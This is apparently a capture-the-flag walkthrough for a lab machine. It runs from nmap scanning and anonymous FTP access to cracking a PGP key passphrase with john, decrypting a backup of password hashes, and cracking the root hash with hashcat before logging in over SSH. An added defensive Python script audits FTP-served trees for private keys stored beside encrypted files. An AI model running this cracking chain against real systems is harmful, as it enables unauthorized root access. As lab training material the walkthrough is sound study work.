Initial Reconnaissance
Network scanning to identify available services:
nmap -v -sC -sV -oA nmap 10.10.177.146
The scan revealed two accessible services: FTP and SSH.
FTP Enumeration
The FTP service allowed anonymous authentication. Connecting with default credentials granted access to user directories and system files:
ftp 10.10.177.146
anonymous:anonymous
After exploring the filesystem, the user flag was located and retrieved from an accessible user directory.
Encrypted File Discovery
Continued enumeration revealed encrypted files in the root directory:
- A PGP backup file
- An associated ASCII key file
Both files were downloaded for offline analysis.
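A defender-side check for the condition found here, as an added example that is not part of the original write-up: it walks a directory tree that an FTP service exposes and flags ASCII-armored private keys and encrypted files stored next to them. The function names, severities and the sample tree with its exposed/ and archive/ directories are constructed for illustration; co-location is a heuristic and does not prove that the key matches the file.

```python
import os
import tempfile
from pathlib import Path

KEY_ARMOR = b"-----BEGIN PGP PRIVATE KEY BLOCK-----"
MSG_ARMOR = b"-----BEGIN PGP MESSAGE-----"


def classify(path):
    """Return 'key', 'encrypted' or None from the first bytes and the suffix."""
    with path.open("rb") as fh:
        head = fh.read(4096)
    if KEY_ARMOR in head:
        return "key"
    encrypted = MSG_ARMOR in head or path.suffix.lower() in (".pgp", ".gpg")
    return "encrypted" if encrypted else None


def audit_tree(root):
    """Return sorted (severity, relative path, reason) findings under root."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):  # does not follow symlinked dirs
        files = [f for f in (Path(dirpath, n) for n in names) if f.is_file() and not f.is_symlink()]
        kinds = {f: classify(f) for f in files}
        keys = [f for f in files if kinds[f] == "key"]
        for f in keys:
            exposed = bool(f.stat().st_mode & 0o004)  # readable by "other"
            findings.append(("high" if exposed else "medium", str(f.relative_to(root)),
                             "private key in served tree, world-readable=%s" % exposed))
        for f in (f for f in files if keys and kinds[f] == "encrypted"):
            findings.append(("critical", str(f.relative_to(root)),
                             "encrypted file stored beside a private key"))
    return sorted(findings)


def make_sample():
    """Build a constructed tree: a key/backup pair and a lone encrypted file."""
    root = Path(tempfile.mkdtemp())
    files = {"exposed/private.asc": KEY_ARMOR + b"\n(constructed)\n",
             "exposed/backup.pgp": b"constructed ciphertext",
             "archive/old.gpg": b"constructed ciphertext"}
    for rel, data in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_bytes(data)
        (root / rel).chmod(0o644)
    return root


if __name__ == "__main__":
    print("\n".join("\t".join(f) for f in audit_tree(make_sample())))
```

Run it with read access to the whole tree; once an encrypted backup sits beside its private key, the only remaining protection is the key's passphrase.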
GPG Key Cracking
The private key was imported and converted for password cracking:
gpg --import private.asc
sudo gpg2john private.asc > privateBop
sudo john privateBop
This recovered the passphrase protecting the GPG key.
Backup Decryption
With the recovered passphrase, the backup file was decrypted:
gpg --decrypt backup.pgp
The decrypted content revealed system password hashes, including the root user's hash.
Root Password Cracking
echo '$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0' > hash
hashcat -m 1800 -a 0 hash /usr/share/wordlists/rockyou.txt --force
The recovered password was hikari.
SSH Access and Root Flag
ssh root@10.10.177.146
With root access obtained, the final flag was retrieved from the system.